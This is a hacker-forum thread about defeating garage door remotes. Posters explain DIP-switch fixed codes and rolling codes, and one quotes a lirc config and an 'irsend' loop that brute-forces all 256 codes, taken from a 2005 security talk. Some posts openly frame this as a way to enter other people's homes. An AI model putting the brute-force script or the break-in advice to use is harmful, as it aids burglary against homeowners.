Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.

Hacking a garagedoor

0 0

Hello peps! I was recently watching this video (check link) and how funny wouldn't be to be able to hack a garage door? :P And everything in life shouldn't be easy as shit, so they dint tell where to find this sweet source-code, therefor I am bringing this topic here.

Just in case you know something, find something, or may help developing this kind of code.

And of course, human knowledge belongs to the world :)

Thanks

http://www.youtube.com/watch?v=v9EQqKh2IKg

0 0

Now that is a pretty sick video. Well it is time to go googling. It would be pretty awesome to script this too. What would be the base to find the signal and receive the info though.

Its just no where. There is not 1 place left with the script or a similar script. Did you come across anything findings? It is so interesting.

0 1

thats what i love about hacking. can be applied to anything. hardware hacks i think are pretty awesome. very impressed with the video.

thanks for the link.

2,795 1

I love household hacks, they prove to be the most impressive.

Retired
10 0

thats crazy, but that would be breaking and entering right? i mean into the remote ,not the garage, who cares about people security?

0 0

I will keep googling, searching and asking. When and if the code is found, it would be shared. Post if you know anything that may get us on the track.

0 0

I see your point. And its even damn amazing automatic software, or just bullshit. But the though of getting a garage door to open was just that funny that it was worth a shot to check out what you guys mean.

And of course, theoretically this should be possible, just not that easy thats shown on the video.

0 0

Do you have a Garage Door Remote Control ? Anyone ?

Crack it open . Usualy all you have to do is open the area on the back where the bateries go . You should normaly find in the average remote that in this location of it you will find a small dip switch with five to ten switches (almost always) with on/off positions . Its all based on frequency . Change the station ;) ! Just about 7 years ago all they had was five switches and figuring out someones garage door code was much easier now most have ten . Ofcourse raising the combinations and making this much harder .

Heres some examples :

Heres a link i found that further explain the programing of one remote :

http://multicoderemotesonline.com/files/4140_Multi_Code.pdf

Some people have been able to play aorund with these on test drives and open other peoples garage doors . This type of thing is like a B&E 101 method . The easiest thing to do is get a universal garage door opener so that its output can speak to many different garage doors . Then just figuring out the code per garage door .

Also in theory since garage doors still operate on radio signals , you could scan them with a scope of some sort and figure out the signal code that way as well . The same as how people can remotely scope (siliscope) IP's in use , so i guess some could scope doors in use . The signal is all digital , so im sure this could be sniped out the air real easy .

If there is some sort of script id imagine its more of an algorythm involved with some sort of scanner to crack the code of the door in use .

Seems interesting at first glance . But then again im sure its been done before . Anything to make an entry to a home more natural . No more searching for open windows just crack the garage door and walk in .

Tog go bog e , Neqtan

Admin from hell
0 0

Whoa, First off ever remote works on a specific frequency. Finding the frequency is the first part. Along with the frequency a remote of any sort (garage door, Car door, Car alarm) also sends a code specifically for that unit. That code can be one of a trillion numbers, As most remotes send out a 40 bit or better code. If you understand how remotes work you will see this video is BS. Look on How stuff works to find out more or google how remotes work.

0 0

Yeah, This would be really cool if someone had at least some kind of guidance or place to look to find out some more in-depth information. Like, not something for skiddies, but instructions on tinkering with advanced hardware and frequencies. Would be coolness ^_^ Ecspecially seeing as the whole street where i am typing this from has automatic garage doors :evil::vamp:

0 0

korg wrote: Whoa, First off ever remote works on a specific frequency. Finding the frequency is the first part. Along with the frequency a remote of any sort (garage door, Car door, Car alarm) also sends a code specifically for that unit. That code can be one of a trillion numbers, As most remotes send out a 40 bit or better code. If you understand how remotes work you will see this video is BS. Look on How stuff works to find out more or google how remotes work.

Standard Grage Door Openers =

Old style garage door openers worked specificaly on frequency witch was altered by dipswitches . To eliminate nuisances with neighbors . There was no security features , and there was five dip switches witch made it stupid easy to break in to someones home .

New age Garage Door Openers =

Heres something i found at wiki . (Im an Electrician not a Garage Door Instalation Technician ;) )

http://en.wikipedia.org/wiki/Garage_door_opener

" The current garage door opener market uses a frequency spectrum range between 300-400 MHz and most of the transmitter / receivers rely on hopping or rolling code technology. This approach prevents perpe - trators from recording a code and replaying it to open a garage door. Since the signal is supposed to be significantly different from that of any other garage door remote control, manufacturers claim it is impossible for someone other than the owner of the remote to open the garage. When the transmitter sends a code, it generates a new code using an encoder. The receiver, after receiving a correct code, uses the same encoder with the same original seed to generate a new code that it will accept in the future. Because there is a high probability that someone might accidentally push the open button while not in range and desynchronize the code, the transmitter and receiver generate look-a-head codes ahead of time. "

http://en.wikipedia.org/wiki/Rolling_code

This does seem to throw a nasty monkey wrench in the system of breaking the code . So not only does it send a radio frequency its sending an encrypted code that is randomized upon every transfer . But then the remote and opener have back-up look ahead codes just in case the next time the client opens the garage door without the remote . This still seems feasable to crack . But requires alot of knowledge about the individual garage door opener and the way its made . Knowing the encryption method and the randomizer programing thats inside of both the door and remote .

Personaly i think the video is revolved around the old style of doors im reffereing to . Just because theres new styles out doesnt mean every penny pinching ma and pa are gonna buy it . I can asure you theres to many of the old ones out there still to this day .

Heres another nice little article about keyless entry :

Use control f to find things like replay attack and garage door .

Heres something even better :

markuphttp://64.233.167.104/search?q=cache:hHetnOl4nOwJ:www.alcrypto.co.uk/MMIrDA/mmirda_syscan05.pdf+replay+attacks+on+garage+door+openers&hl=en&ct=clnk&cd=1&gl=us&client=firefox-a

Who evers interested in this topic must read this above ! This breaks down the basics of how to get started in this realm of hardware .

I ripped this from the above url :

Learn testcodes with 'irrecord':

begin remote
name garage
bits
one
214 558
zero
214 259
toggle_bit
begin codes
0x0000000000000000
0x0000000000000001
0x0000000000000080
e3
0x00000000000000e3
# 00011100 inverted
ff
0x00000000000000ff
end codes
end remote```

Tog go bog e , Neqtan

0 0

Im sorry for the double post but my first one was long enough . The following below requires a double post and i think is worth it :

Learntestcodeswith'irrecord':
begin remote
name garage
bits
one
214 558
zero
214 259
toggle_bit
begin codes
0x0000000000000000
0x0000000000000001
0x0000000000000080
e3
0x00000000000000e3
# 00011100 inverted
ff
0x00000000000000ff
end codes
end remote```

```markupNowfillinthegaps
perl -e 'for (0..255) { printf(" %02x\t\t0x%016x\n",$_,$_) }'
0x0000000000000001
0x0000000000000001
0x0000000000000002
0x0000000000000003
0x0000000000000004
0x0000000000000005
0x0000000000000006
0x0000000000000007
0x0000000000000008
0x0000000000000009
0a
0x000000000000000a
0b
0x000000000000000b
.```

```markupSendallcodes
for i in `perl -e 'for (0..255) { printf("%02x\n",$_) }'` ; do irsend SEND_ONCE
garage $i ; done
irsend SEND_ONCE garage 00
irsend SEND_ONCE garage 01
irsend SEND_ONCE garage 02
irsend SEND_ONCE garage 03
irsend SEND_ONCE garage 04
irsend SEND_ONCE garage 05
irsend SEND_ONCE garage 06
irsend SEND_ONCE garage 07
54secondstosendall256codes

The above snippets of code were written (I believe) by :

Major Malfunction Security professional by day White Hat hacker since the '70s DEFCON Goon since DC5 Co-founder of InterFACE internet pirate radio station

Contact: majormal@pirate-radio.org http://www.alcrypto.co.uk

Written in 2005

You can find it in the link from my above post .

Tog go bog e , Neqtan

Looks like there is a script for hacking garage doors . Perl ftw ! ;)

0 0

Im confused, lost in the values. Where we fill the 3 .'s in. The gaps. How do we get those values? Via knowledge from the dip switches?

Heres what I get returned.

<Might be a runaway multi-line ' ' string starting on line 2>
Can't find string terminator " ' " anywhere before EOF at GarageDoor.pl line 59```

0 0

now thats a cool concept, I love it when 'hacking' gets out of the computer box and czn be applied to other things, not maliciously, just because we know we can :p. If I had an automatic garage door id try this hack pronto, but theyre not that common in the UK :(

Kudos for this interesting vid tho B)

0 0

talkin about household hacker, and saying that everything household hacker is saying is BS

Admin from hell
0 0

dex_poet Said what?:
building on korgs statement, aparently just about everything that guy has posted if BS. But then that means what exactly…

Are you talking about me or the HouseholdHacker.:@

0 0

He is saying HouseHold. "video." So are you saying that is BS and this is actually going to work as long as those lines are filled in correctly?

0 0

Seriously DEX !?

Wireless internet has the same functioning as this garage door remote communication . They both use digital wireless comunication , they both use a form of encryption in the delivery and retrieval of the message . Actualy cracking the WEP of a wireless network is more complicated than cracking this system . The only difference is cracking WEP is probably easier since the software to do it is more readily accessible than would be software to crack a garage door algorythm .

Your also wrong about the garage doors bieng only hardware .

2004 :

"On August 31st, the Federal Circuit Court of Appeals issued what was the second appellate ruling dealing with the anti-circumvention provisions of the Digital Millennium Copyright Act (DMCA). The court determined that the universal garage door opener remotes made by Skylink Technologies did not violate the DMCA by illicitly accessing the software in the Chamberlain Group's garage door openers."

The Chamberlain Group is the largest single producer of garage doors . They are the makers of the LiftMaster , hands down the number one used garage door opener .

Hmm something interesting i found , gives me ideas :

"Hundreds of automatic garage doors in the Ottawa area have suddenly and strangely stopped working, due to a powerful radio signal that appears to be interfering with their remote controls."

Read more :

http://www.cbc.ca/canada/ottawa/story/2005/11/04/ot-garageopen20051104.html

Now this is funny , its at the link above :

"The signal is transmitted on the 390-megahertz band, which is used by virtually all garage door openers on the continent.

It's the same frequency used by the U.S. military's new state-of-the-art Land Mobile Radio System. "

No a Random Construction worker wouldnt know more about this topic .

I havent watched the video myself , but the concept alone is intriguing . I wont speak for the household hackers behalf , but i will say that this concept is not bullshit and could easily be accomplished with a little work !

Tog go bog e , Neqtan